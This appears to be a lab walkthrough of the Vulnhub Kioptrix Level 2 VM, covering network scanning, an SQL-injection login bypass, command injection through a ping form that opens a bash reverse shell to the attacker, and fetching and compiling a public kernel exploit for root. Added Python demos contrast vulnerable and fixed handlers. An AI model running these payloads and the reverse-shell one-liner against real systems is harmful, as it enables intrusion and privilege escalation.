
Vulnhub practice: Kioptrix Level 2

Discovering the target

The target is CentOS 4.5. Before booting it, edit the VM descriptor CentOs4.5.vmx and change ethernet0.networkName = "Bridged" to ethernet0.networkName = "Nat", so that the target sits on the same NAT segment as the Kali attacker. Only then can we discover its IP.

sudo arp-scan -l finds the target at 192.168.80.16 (the attacker, eth0, is 192.168.80.14; the other two responders are the VMware NAT gateway and DHCP server).

kali@kali:~$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b2:07:af, IPv4: 192.168.80.14
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.80.1 00:50:56:c0:00:08 VMware, Inc.
192.168.80.2 00:50:56:fc:96:a7 VMware, Inc.
192.168.80.16 00:0c:29:6d:00:a3 VMware, Inc.
192.168.80.254 00:50:56:f8:e1:4e VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.073 seconds (123.49 hosts/sec). 4 responded

Scanning further

A SYN scan with sudo nmap -sS -T5 -Pn 192.168.80.16 lists the open ports and services below. -T5 is the most aggressive timing template and can miss ports on a lossy link; against a VM on the same host it is fine.

kali@kali:~$ sudo nmap -sS -T5 -Pn 192.168.80.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 01:02 EST
Nmap scan report for 192.168.80.16
Host is up (0.0017s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
3306/tcp open mysql
MAC Address: 00:0C:29:6D:00:A3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds

For service versions and OS detection, run sudo nmap -A -T5 -sS 192.168.80.16. Note how old everything is: OpenSSH 3.9p1 still offering SSHv1, Apache 2.0.52, a TLS endpoint that accepts SSLv2, and CUPS 1.1, all consistent with CentOS 4.5 and a 2.6.9-era kernel.

kali@kali:~$ sudo nmap -A -T5 -sS 192.168.80.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 01:15 EST
Nmap scan report for 192.168.80.16
Host is up (0.0010s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
|_ssl-date: 2020-02-24T04:06:21+00:00; -2h09m35s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:6D:00:A3 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -2h09m35s

TRACEROUTE
HOP RTT ADDRESS
1 1.04 ms 192.168.80.16

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.12 seconds

Port 80 serves a web page

Nmap showed an HTTP service, so open http://192.168.80.16 in a browser. The page is a bare login form asking for a username and password. Before anything heavier, try the classic SQL-injection bypass (the "universal password"): enter 'or 1=1# as the username, with any password, and the admin console opens.
Why it works: the form evidently concatenates the two fields into its login query. The leading quote closes the string literal, or 1=1 makes the WHERE clause true for every row, and # starts a MySQL line comment (port 3306 is open on this host) that swallows the rest of the statement, including the password check.
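The following Python script is an added example, not code from the page or from the Kioptrix VM, that reproduces the bypass against a constructed in-memory table and shows the parameterised form that defeats it. The table, the handler functions and their names are assumptions for illustration only; the target's real schema is never shown. MySQL treats # as a line comment, which is what the page's payload relies on; SQLite, used here so the demo runs offline, only understands "-- ", so the runnable payload uses that spelling with the identical effect of commenting out the password check.

```python
import sqlite3

# Constructed sample table for the demo (hypothetical; not the target's real schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'secret')")
    return db

def render_query(username, password):
    """The SQL a concatenating login handler sends to the database, verbatim."""
    return ("SELECT * FROM users WHERE username='" + username
            + "' AND password='" + password + "'")

def vulnerable_login(db, username, password):
    """Concatenates user input into the statement, so quotes and comment
    markers in the input are parsed as SQL rather than compared as data."""
    row = db.execute(render_query(username, password)).fetchone()
    return row is not None

def safe_login(db, username, password):
    """Bound parameters: the driver sends the values separately from the
    statement text, so the same payload is just an unusual username."""
    row = db.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    # What MySQL receives for the page's payload: '#' comments out the password check.
    print(render_query("'or 1=1#", "x"))
    # SQLite only knows '-- ' line comments, so the executable demo uses that form.
    payload = "' OR 1=1 -- "
    print("vulnerable:", vulnerable_login(db, payload, "x"))  # True
    print("safe:      ", safe_login(db, payload, "x"))        # False
```

The rendered string for the page's payload is SELECT * FROM users WHERE username=''or 1=1#' AND password='x'; everything after # is dead text to MySQL, which is why the password field can hold anything.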

Using the submit form to get a reverse shell

Start a listener on port 4444 on the attacker, then submit ping 192.168.80.14; bash -i >& /dev/tcp/192.168.80.14/4444 0>&1 in the web form. The form hands the field to a shell as the argument of ping, so ; terminates the ping command and the second command runs with the web server's privileges. The reverse shell itself is the bash one-liner bash -i >& /dev/tcp/192.168.80.14/4444 0>&1: /dev/tcp/HOST/PORT is a bash-only pseudo-device that opens a TCP connection, >& sends both stdout and stderr into it, and 0>&1 reads stdin from the same socket. It only works when bash, not a plain sh, interprets the command; the bash-3.00$ prompt below confirms that is the case here.

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.80.16: inverse host lookup failed: Unknown host
connect to [192.168.80.14] from (UNKNOWN) [192.168.80.16] 43719
bash: no job control in this shell
bash-3.00$ whoami
apache
bash-3.00$ pwd
/var/www/html
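To make the ; trick concrete, here is an added Python example (not code from the page or from the Kioptrix application) that models the form's handler three ways: passing the field through a shell, passing it as a single argv element, and validating it as an IP address first. The function names are hypothetical, and echo stands in for ping so the script runs offline without raw sockets; that substitution does not change the behaviour, because the injection happens in the shell before the program ever runs.

```python
import ipaddress
import subprocess

# The target's form runs `ping <input>` via a shell. `echo` stands in for
# ping here (assumption for an offline demo); the injection point is the
# shell, not the program, so the behaviour is the same.
PING_CMD = "echo PING"

def vulnerable_ping(target):
    """shell=True hands the whole string to /bin/sh, which treats ';' as a
    command separator: the appended command runs under the web server's uid."""
    result = subprocess.run(PING_CMD + " " + target, shell=True,
                            capture_output=True, text=True)
    return result.stdout

def argv_ping(target):
    """No shell: the input is one argv element, so ';' reaches the program
    as literal characters and nothing else is executed."""
    result = subprocess.run(PING_CMD.split() + [target],
                            capture_output=True, text=True)
    return result.stdout

def safe_ping(target):
    """Defence in depth: additionally refuse anything that is not a literal
    IPv4/IPv6 address before it goes anywhere near a process."""
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        raise ValueError("refusing non-IP target: %r" % (target,))
    return argv_ping(str(addr))

if __name__ == "__main__":
    # Same shape as the page's payload, with a harmless command after the ';'.
    payload = "192.168.80.14; echo INJECTED"
    print(vulnerable_ping(payload))    # PING 192.168.80.14 / INJECTED
    print(argv_ping(payload))          # PING 192.168.80.14; echo INJECTED
    print(safe_ping("192.168.80.14"))  # PING 192.168.80.14
```

In the vulnerable variant the second line of output comes from the injected command; in the argv variant the whole field is printed back as data. Replace echo INJECTED with the bash reverse-shell one-liner and the first variant is exactly the path used against the target.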


  • Further reading (other ways to spawn a reverse shell): reference

Finding a kernel exploit

From the shell we just obtained, check the target's kernel. This build dates from May 2007, so old...
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
A search for public exploits against this kernel turns up Exploit-DB 9545, the sock_sendpage() NULL-pointer dereference local root exploit (CVE-2009-2692) for 2.4 and 2.6 kernels on 32-bit x86; the i686 in the uname output matches. Download it to the attacker:
kali@kali:~$ wget https://www.exploit-db.com/download/9545
--2020-02-24 01:41:53-- https://www.exploit-db.com/download/9545
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: ‘9545’

9545 [ <=> ] 9.55K --.-KB/s in 0s

2020-02-24 01:41:58 (25.7 MB/s) - ‘9545’ saved [9783]
On the attacker, rename the file and serve it from the local Apache web root:
kali@kali:~$ mv 9545 exploit.c
kali@kali:~$ sudo mv exploit.c /var/www/html/ # put the exploit in the web root
[sudo] password for kali:
kali@kali:~$ /etc/init.d/apache2 start # start apache
Starting apache2 (via systemctl): apache2.service.
In the target shell, fetch the exploit from the attacker with curl 192.168.80.14/exploit.c -o exploit.c, compile it and run it to get root. This relies on the target having gcc installed (it does here) and a writable directory such as /tmp; the "no newline at end of file" warning is harmless.
bash-3.00$ cd /tmp && id && curl 192.168.80.14/exploit.c -o exploit.c 2> /dev/null && gcc exploit.c && ./a.out
uid=48(apache) gid=48(apache) groups=48(apache)
exploit.c:376:28: warning: no newline at end of file
sh: no job control in this shell
sh-3.00# whoami
root

Reference post

https://v3ded.github.io/ctf/kioptrix2.html

Summary

The main lesson of this box is how to obtain a reverse shell. Faced with a simple web login form, first try an SQL-injection bypass (the "universal password") before anything heavier.
When a submitted value is handed to a shell as part of a command (here, the argument to ping), remember that a shell accepts several commands on one line and runs them in order. Appending ; followed by a malicious command, such as the reverse-shell one-liner, therefore makes the server execute it.
When the target runs an old OS, look up a public kernel exploit for that exact version and use it to escalate privileges.